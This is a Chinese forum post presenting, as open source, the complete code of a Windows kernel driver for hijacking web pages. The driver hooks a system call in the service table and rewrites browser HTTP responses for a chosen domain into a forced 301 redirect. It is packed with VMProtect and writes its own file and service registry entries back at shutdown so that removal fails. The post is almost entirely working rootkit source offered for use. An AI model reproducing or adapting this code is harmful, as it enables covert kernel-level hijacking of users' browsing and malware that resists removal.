实现网页劫持跳转代码开源

无限感觉 · 发表于 2013-3-17 08:49:17

下面代码在内核层实现URL跳转，代码公开。

#ifdef __cplusplus
extern "C"
{
#endif
#include <ntddk.h>
#ifdef __cplusplus
}
#endif
#include "VMProtectSDK.h"
#pragma comment(lib, "VMProtectSDK32.lib")
#include "1.h"
ULONG ZwDeviceIoControlFile_BaseAddress = 0x0;
ULONG ZwDeviceIoControlFile_value = 0x0;
ULONG ZwDeviceIoControlFile_num = 0x0;
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
PDEVICE_OBJECT Device;
UNICODE_STRING SymName;
Device = DriverObject->DeviceObject;
if (Device != NULL)
{
RtlInitUnicodeString(&SymName, DEVSYMNAME);
IoDeleteSymbolicLink(&SymName);
IoDeleteDevice(Device);
}
if (ZwDeviceIoControlFile_BaseAddress != 0 && ZwDeviceIoControlFile_value != 0)
{
ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, ZwDeviceIoControlFile_value);
}
}
typedef struct AFD_WSABUF{
ULONG len ;
PCHAR buf ;
}AFD_WSABUF , *PAFD_WSABUF;
typedef struct AFD_INFO {
PAFD_WSABUF BufferArray ;
ULONG BufferCount ;
ULONG AfdFlags ;
ULONG TdiFlags ;
} AFD_INFO, *PAFD_INFO;
typedef struct _LYH_ie{
HANDLE pid;
HANDLE FileHandle;
}LYH_IE,*PLYH_IE;
#define IE_MaxNum 1000
LYH_IE IeBuff[IE_MaxNum];
NTSTATUS NTAPI LYH_ZwDeviceIoControlFile(IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength)
{
NTSTATUS RetValue = STATUS_SUCCESS;
HANDLE pid = 0x0;
PAFD_INFO AdInfo;
ULONG len,i;
BOOLEAN IsFind = FALSE;
CHAR JmpUrl[] = {"HTTP/1.1 301 Moved Permanently\r\nLocation: http://www.qq.com\r\n"};
PMDL pMdl;
PVOID MdlAddress;
PEPROCESS process;
PCHAR name;
BOOLEAN IsSoGou = FALSE;
pid = PsGetCurrentProcessId();
if (IoControlCode == 0x1201f)
{
AdInfo = (PAFD_INFO)InputBuffer;
len = AdInfo->BufferArray->len;
process = PsGetCurrentProcess();
name = PsGetProcessImageFileName(process);
if (_stricmp(name, "sogouexplorer.e") == 0)
{
IsSoGou = TRUE;
}
else
{
IsSoGou = FALSE;
}
IsFind = FALSE;
pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);
if (pMdl != NULL)
{
_try
{
MmProbeAndLockPages(pMdl, UserMode, IoReadAccess);
MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);
if (MdlAddress != NULL)
{
if (_strnicmp((PCHAR)MdlAddress, "get", 3) == 0 || _strnicmp((PCHAR)MdlAddress, "post", 4) == 0)
{
if (len > 0x14)
{
len -= 0x14;
}
for (i = 0; i < len; i++)
{
if (_strnicmp((PCHAR)((ULONG)MdlAddress + i), "www.360.com", 14) == 0 )
{
IsFind = TRUE;
break;
}
}
}
}
MmUnlockPages(pMdl);
}_except(EXCEPTION_EXECUTE_HANDLER)
{
}
IoFreeMdl(pMdl);
}
if (IsFind)
{
IsFind = FALSE;
for (i = 0; i < IE_MaxNum; i++)
{
if (!IsSoGou)
{
if (IeBuff[i].FileHandle == FileHandle && IeBuff->pid == pid) //遍历这个进程
{
IsFind = TRUE;
break;
}
}
else
{
if (IeBuff[i].pid == pid)
{
IsFind = TRUE;
break;
}
}
}
//如果没有找到，就添加
if (!IsFind)
{
for (i = 0; i < IE_MaxNum; i++)
{
if (IsSoGou)
{
if (IeBuff[i].pid == 0 && IeBuff[i].FileHandle == 0)
{
IeBuff[i].FileHandle = FileHandle; IeBuff[i].pid = pid;
break;
}
}
else
{
if (IeBuff[i].FileHandle == 0 || IeBuff[i].pid == 0)
{
IeBuff[i].FileHandle = FileHandle; IeBuff[i].pid = pid;
break;
}
}
}
}
}
}
_asm
{
pushad
push OutputBufferLength
push OutputBuffer
push InputBufferLength
push InputBuffer
push IoControlCode
push IoStatusBlock
push ApcContext
push ApcRoutine
push Event
push FileHandle
call ZwDeviceIoControlFile_value
mov RetValue,eax
popad
}
if (NT_SUCCESS(RetValue))
{
if (IoControlCode == 0x12017)
{
AdInfo = (PAFD_INFO)InputBuffer;
len = AdInfo->BufferArray->len;
process = PsGetCurrentProcess();
name = PsGetProcessImageFileName(process);
if (_stricmp(name, "sogouexplorer.e") == 0)
{
IsSoGou = TRUE;
}
else
{
IsSoGou = FALSE;
}
pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);
if (pMdl != NULL)
{
_try{
MmProbeAndLockPages(pMdl, UserMode, IoWriteAccess);
MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);
if (MdlAddress != NULL)
{
if (_strnicmp((PCHAR)MdlAddress, "http", 4) == 0)
{
IsFind = FALSE;
for (i = 0; i < IE_MaxNum; i++)
{
if (IsSoGou)
{
if (IeBuff[i].pid == pid)
{
IsFind = TRUE;
IeBuff[i].FileHandle = 0x0; IeBuff[i].pid = 0x0;
break;
}
}
else
{
if (IeBuff[i].FileHandle == FileHandle && IeBuff[i].pid == pid)
{
IsFind = TRUE;
IeBuff[i].FileHandle = 0x0; IeBuff[i].pid = 0x0;
break;
}
}
}
if (IsFind)
{
strcpy((PCHAR)MdlAddress, JmpUrl);
}
}
}
MmUnlockPages(pMdl);
}_except(EXCEPTION_EXECUTE_HANDLER)
{
}
IoFreeMdl(pMdl);
}
}
}
return RetValue;
}
NTSTATUS DefDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
UNICODE_STRING RestoreRegPath;
PKEY_VALUE_PARTIAL_INFORMATION pvpi = NULL;
ULONG FileSize = 0x0;
PVOID FileBuff = NULL;
NTSTATUS ShutDownDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
{
NTSTATUS status;
HANDLE hkey;
OBJECT_ATTRIBUTES ObjectAttributes;
UNICODE_STRING RegName;
PWCHAR DisplayName = {L"WebNdis"};
ULONG ErrorControl = 0x1, Start = 0x1, Type = 0x1;
//写文件
HANDLE hfile;
IO_STATUS_BLOCK IoStatus;
LARGE_INTEGER number;
if (FileBuff != NULL)
{
RtlInitUnicodeString(&RegName, (PCWSTR)pvpi->Data);
InitializeObjectAttributes(&ObjectAttributes, &RegName, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&hfile, GENERIC_WRITE, &ObjectAttributes, &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (NT_SUCCESS(status))
{
number.QuadPart = 0x0;
ZwWriteFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize, &number, NULL);
ZwClose(hfile);
}
}
//注册表回写
if (pvpi != NULL)
{
InitializeObjectAttributes(&ObjectAttributes, &RestoreRegPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes, 0, NULL, 0, NULL);
if (NT_SUCCESS(status))
{
RtlInitUnicodeString(&RegName, L"DisplayName");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, DisplayName, (wcslen(DisplayName) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"ErrorControl");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &ErrorControl, 4);
//路径
RtlInitUnicodeString(&RegName, L"ImagePath");
ZwSetValueKey(hkey, &RegName, 0, REG_SZ, pvpi->Data, (wcslen((PWCHAR)pvpi->Data) + 1) * sizeof(WCHAR));
RtlInitUnicodeString(&RegName, L"Start");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Start, 4);
RtlInitUnicodeString(&RegName, L"Type");
ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Type, 4);
ZwClose(hkey);
}
}
return STATUS_SUCCESS;
}
#ifdef __cplusplus
extern "C"
#endif
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
ULONG MajorVersion,MinorVersion;
DriverObject->DriverUnload = OnUnload;
PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
if (MajorVersion == 0x5 && MinorVersion == 0x2)
{
ZwDeviceIoControlFile_num = 0x45;
}
else if (MajorVersion == 0x5 && MinorVersion == 0x1)
{
ZwDeviceIoControlFile_num = 0x42;
}
else
{
return STATUS_UNSUCCESSFUL;
}
memset(IeBuff, 0, 4 * IE_MaxNum);
ZwDeviceIoControlFile_BaseAddress = (ULONG)KeServiceDescriptorTable->ServiceTableBase + ZwDeviceIoControlFile_num * 4; //xp 0x42 2003 0x45
ZwDeviceIoControlFile_value = *(PULONG)ZwDeviceIoControlFile_BaseAddress;
ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, (ULONG)LYH_ZwDeviceIoControlFile);
{
UNICODE_STRING DevName,SymName;
NTSTATUS status;
PDEVICE_OBJECT fdo;
RtlInitUnicodeString(&DevName, DEVICENAME);
status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &fdo);
if (!NT_SUCCESS(status))
{
return status;
}
RtlInitUnicodeString(&SymName, DEVSYMNAME);
status = IoCreateSymbolicLink(&SymName, &DevName);
if (!NT_SUCCESS(status))
{
IoDeleteDevice(fdo);
return status;
}
fdo->Flags |= DO_BUFFERED_IO;
DriverObject->MajorFunction[IRP_MJ_CREATE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DefDispatch;
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = ShutDownDispatch;
RestoreRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, RegistryPath->Length + 1);
RtlCopyMemory(RestoreRegPath.Buffer, RegistryPath->Buffer, RegistryPath->Length);
RestoreRegPath.Length = RestoreRegPath.MaximumLength = RegistryPath->Length;
{
//读取注册表文件位置,以备回写
HANDLE hkey;
UNICODE_STRING ValueName;
OBJECT_ATTRIBUTES ObjectAttributes;
ULONG ulSize = 0x0;
RtlInitUnicodeString(&ValueName, L"ImagePath");
InitializeObjectAttributes(&ObjectAttributes, RegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwOpenKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes);
if (NT_SUCCESS(status))
{
status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, NULL, 0, &ulSize);
if (status == STATUS_BUFFER_TOO_SMALL)
{
pvpi = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePool(PagedPool, ulSize);
if (pvpi != NULL)
{
status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, pvpi, ulSize, &ulSize);
if (!NT_SUCCESS(status))
{
ExFreePool(pvpi);
pvpi = NULL;
}
}
}
ZwClose(hkey);
}
//读文件，以备回写
HANDLE hfile;
IO_STATUS_BLOCK IoStatus;
FILE_STANDARD_INFORMATION fsi;
if (pvpi != NULL)
{
RtlInitUnicodeString(&ValueName, (PCWSTR)pvpi->Data);
InitializeObjectAttributes(&ObjectAttributes, &ValueName, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&hfile, GENERIC_READ, &ObjectAttributes, &IoStatus, NULL,
FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (NT_SUCCESS(status))
{
status = ZwQueryInformationFile(hfile, &IoStatus, &fsi, sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation);
if (NT_SUCCESS(status))
{
FileSize = (ULONG)fsi.EndOfFile.QuadPart;
FileBuff = ExAllocatePool(NonPagedPool, FileSize);
if (FileBuff != NULL)
{
status = ZwReadFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize, NULL, NULL);
if (!NT_SUCCESS(status))
{
FileSize = 0x0;
ExFreePool(FileBuff);
FileBuff = NULL;
}
}
}
ZwClose(hfile);
}
}
}
//注册关机回写
IoRegisterShutdownNotification(fdo);
}
return STATUS_SUCCESS;
}

复制代码

		自动登录	找回密码
密码			注册账号